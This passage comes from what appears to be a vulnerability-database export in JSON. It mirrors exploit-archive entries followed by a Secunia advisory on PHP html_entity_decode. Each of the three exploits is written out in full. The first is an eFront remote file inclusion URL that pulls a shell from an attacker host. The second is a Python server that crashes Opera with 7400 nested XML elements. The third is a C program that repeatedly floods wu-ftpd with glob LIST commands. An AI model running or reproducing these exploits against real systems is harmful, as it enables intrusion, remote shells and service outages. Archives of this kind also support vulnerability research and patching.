{"lastseen": "2018-01-04T15:02:43", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-09-15T00:00:00", "published": "2009-09-15T00:00:00", "id": "1337DAY-ID-5768", "href": "https://0day.today/exploit/description/5768", "type": "zdt", "title": "efront <= 3.5.4 (database.php path) Remote File Inclusion Vulnerability", "sourceData": "=======================================================================\r\nefront <= 3.5.4 (database.php path) Remote File Inclusion Vulnerability\r\n=======================================================================\r\n\r\n\r\n########################################################################\r\n#efront <= 3.5.4 Remote File Include Vulnerability\r\n#Download Script : http://sourceforge.net/projects/efrontlearning/files/\r\n#Author : cr4wl3r \r\n#Location : Gorontalo - INDONESIA\r\n########################################################################\r\n#file :\r\n# database.php \r\n#line 15 require_once($path.'adodb/adodb.inc.php');\r\n########################################################################\r\n#3xplo!t :\r\n#http://target.com/[path]/libraries/database.php?path=http://attacker.com/shell.txt??? \r\n########################################################################\r\n#sekuritionline.net (all crew sekuritionline)\r\n#manadocoding.net (all crew manadocoding)\r\n########################################################################\r\n\r\n\r\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5768"}, {"lastseen": "2018-04-10T01:46:11", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2009-03-30T00:00:00", "published": "2009-03-30T00:00:00", "id": "1337DAY-ID-6796", "href": "https://0day.today/exploit/description/6796", "type": "zdt", "title": "Opera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit", "sourceData": "==================================================================\r\nOpera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit\r\n==================================================================\r\n\r\n\r\n#\r\n# Author : Ahmed Obied ([email\u00a0protected])\r\n#\r\n#\r\n# - Tested using the latest version of Opera (9.64)\r\n#\r\n# Usage : python opera.py [port]\r\n# \r\n\r\nimport sys, socket\r\nfrom BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler\r\n\r\nclass RequestHandler(BaseHTTPRequestHandler):\r\n \r\n def get_exploit(self):\r\n exploit = '<A>' * 7400\r\n exploit = '<xml>' + exploit + '</xml>'\r\n return exploit\r\n \r\n def log_request(self, *args, **kwargs):\r\n pass\r\n\r\n def do_GET(self):\r\n if self.path == '/':\r\n print\r\n print '[-] Incoming connection from %s' % self.client_address[0]\r\n print '[-] Sending header to %s ...' % self.client_address[0]\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/xml')\r\n self.end_headers()\r\n print '[-] Header sent to %s' % self.client_address[0]\r\n print '[-] Sending exploit to %s ...' % self.client_address[0]\r\n self.wfile.write(self.get_exploit())\r\n print '[-] Exploit sent to %s' % self.client_address[0]\r\n\r\ndef main():\r\n if len(sys.argv) != 2:\r\n print 'Usage: %s [port]' % sys.argv[0]\r\n sys.exit(1)\r\n try:\r\n port = int(sys.argv[1])\r\n if port < 1 or port > 65535:\r\n raise ValueError\r\n try:\r\n serv = HTTPServer(('', port), RequestHandler)\r\n ip = socket.gethostbyname(socket.gethostname())\r\n print '[-] Web server is running at http://%s:%d/' % (ip, port)\r\n try:\r\n serv.serve_forever()\r\n except KeyboardInterrupt:\r\n print '[-] Exiting ...' \r\n except socket.error:\r\n print '[*] ERROR: a socket error has occurred ...'\r\n sys.exit(-1) \r\n except ValueError:\r\n print '[*] ERROR: invalid port number ...'\r\n sys.exit(-1)\r\n \r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n\n# 0day.today [2018-04-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6796"}, {"lastseen": "2018-01-02T21:07:30", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2005-02-25T00:00:00", "published": "2005-02-25T00:00:00", "id": "1337DAY-ID-5956", "href": "https://0day.today/exploit/description/5956", "type": "zdt", "title": "wu-ftpd <= 2.6.2 File Globbing Denial of Service Exploit", "sourceData": "========================================================\r\nwu-ftpd <= 2.6.2 File Globbing Denial of Service Exploit\r\n========================================================\r\n\r\n\r\n\r\n/*\r\n * wu-ftpd <= 2.6.2 File Globbing DoS \r\n * [email\u00a0protected]\r\n * \r\n * Advisory: http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities&flashstatus=true\r\n *\r\n * Adam Zabrocki (pi3 / pi3ki31ny) is credited with this discovery.\r\n */\r\n\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n\r\n#define SERVER_PORT 21\r\nusage(char *name)\r\n{\r\nprintf(\"usage: %s -h hostname/ip -u user -p passwd\\n\",name);\r\nprintf(\"\\t\\t/str0ke!milw0rm.com wu-ftpd <= 2.6.2 File Globbing DoS\\n\");\r\nexit(0);\r\n}\r\n\r\nmain(int argc, char *argv[]) {\r\n char buffer[1000],host[255],user[255],pass[255],c;\r\n int sd, rc, i=0;\r\n struct sockaddr_in localAddr, servAddr;\r\n struct hostent *h;\r\n\r\nif ( argc < 3) {\r\nusage(argv[0]);\r\n}\r\n\r\nwhile ((c = getopt (argc, argv, \"h:u:p:\")) != EOF)\r\n switch(c)\r\n {\r\n case 'h':\r\n strncpy(host,optarg,sizeof(host));\r\n break;\r\n case 'u':\r\n strncpy(user,optarg,sizeof(user));\r\n break;\r\n case 'p':\r\n strncpy(pass,optarg,sizeof(pass));\r\n break;\r\n }\r\n\r\nwhile(1) {\r\n\r\n h = gethostbyname(host);\r\n if(h==NULL) {\r\n printf(\"unknown host '%s'\\n\",host);\r\n exit(1);\r\n }\r\n\r\n servAddr.sin_family = h->h_addrtype;\r\n memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);\r\n servAddr.sin_port = htons(SERVER_PORT);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd<0) {\r\n perror(\"cannot open socket \");\r\n exit(1);\r\n }\r\n\r\n localAddr.sin_family = AF_INET;\r\n localAddr.sin_addr.s_addr = htonl(INADDR_ANY);\r\n localAddr.sin_port = htons(0);\r\n\r\n rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));\r\n if(rc<0) {\r\n printf(\"%d: cannot bind port TCP %u\\n\",sd,SERVER_PORT);\r\n perror(\"error \");\r\n exit(1);\r\n }\r\n\r\n printf(\"Trying To Connect To [%s]\\n\",host);\r\n rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));\r\n if(rc<0) {\r\n perror(\"cannot connect \");\r\n exit(1);\r\n }\r\n printf(\"Trying Login With [%s]\\n\",user);\r\n snprintf(buffer,sizeof(buffer), \"USER %s\\r\\n\", user);\r\n rc = send(sd, buffer, strlen(buffer), 0);\r\n memset(buffer,0,sizeof(buffer));\r\n\r\nwhile(1)\r\n {\r\n rc=recv(sd,buffer,sizeof(buffer),0);\r\n if(strstr(buffer,\"331\")) break;\r\n if(strstr(buffer,\"421\"))\r\n {\r\n printf(\"Access Denied on your arse..\\n\");\r\n exit(0);\r\n }\r\n }\r\n\r\n printf(\"Sending Pass - [%s]\\n\",pass);\r\n memset(buffer,0,sizeof(buffer));\r\n snprintf(buffer,sizeof(buffer), \"PASS %s\\r\\n\", pass);\r\n rc = send(sd,buffer, strlen(buffer), 0);\r\n\r\nwhile(1)\r\n {\r\n rc=recv(sd,buffer,sizeof(buffer),0);\r\n if(strstr(buffer,\"230\")) break;\r\n if(strstr(buffer,\"421\"))\r\n {\r\n printf(\"Access Denied on your arse..\\n\");\r\n exit(0);\r\n }\r\n\r\n if(strstr(buffer,\"530\"))\r\n {\r\n printf(\"Access Denied: Login Incorrect!\\n\");\r\n exit(0);\r\n }\r\n}\r\n\r\n memset(buffer,0,sizeof(buffer));\r\n snprintf(buffer,sizeof(buffer), \"LIST ***********************************************************************************************************************************************************************************************.*\\r\\n\");\r\n rc = send(sd,buffer, strlen(buffer), 0);\r\n printf(\"Dos Sent\\n\");\r\n\r\n}\r\n\r\n if(rc<0) {\r\n perror(\"cannot send data \");\r\n close(sd);\r\n exit(1);\r\n }\r\nreturn 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5956"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nPHP "html_entity_decode()" Information Disclosure Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA19383\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/19383/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nExposure of sensitive information\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nPHP 4.3.x\r\nhttp://secunia.com/product/922/\r\nPHP 4.4.x\r\nhttp://secunia.com/product/5768/\r\nPHP 5.0.x\r\nhttp://secunia.com/product/3919/\r\nPHP 5.1.x\r\nhttp://secunia.com/product/6796/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been discovered in PHP, which can be exploited by\r\nmalicious people to gain knowledge of potentially sensitive\r\ninformation.\r\n\r\nThe vulnerability is caused due to the "html_entity_decode()" PHP\r\nfunction not being binary safe. This can be exploited to disclose\r\ncertain part of the memory via a script calling the\r\n"html_entity_decode()" function with input controlled by the attacker\r\nand where the result is sent to the attacker.\r\n\r\nSuccessful may allow disclosure of e.g. passwords stored in a PHP\r\nscript.\r\n\r\nThe vulnerability has been confirmed in versions 4.4.2 and 5.1.2.\r\nPrior versions may also be affected.\r\n\r\nSOLUTION:\r\nThe vulnerability has been fixed in the CVS repository and in version\r\n5.1.3-RC1.\r\n\r\nDo not call the "html_entity_decode()" function in PHP scripts where\r\nthe input originates from untrusted sources.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nDiscovered by the vendor and reported to public mailing lists by T\u0445nu\r\nSamuel.\r\n\r\nORIGINAL ADVISORY:\r\nT\u0445nu Samuel:\r\nhttp://archives.neohapsis.com/archives/fulldisclosure/2006-03/1675.html\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-03-29T00:00:00", "published": "2006-03-29T00:00:00", "id": "SECURITYVULNS:DOC:12022", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12022", "title": "[SA19383] PHP "html_entity_decode()" Information Disclosure Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "Iinvalid processing of non-printable characters allows to access memory content.", "modified": "2006-03-29T00:00:00", "published": "2006-03-29T00:00:00", "id": "SECURITYVULNS:VULN:5956", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5956", "title": "PHP html_entity_decode() information leak", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}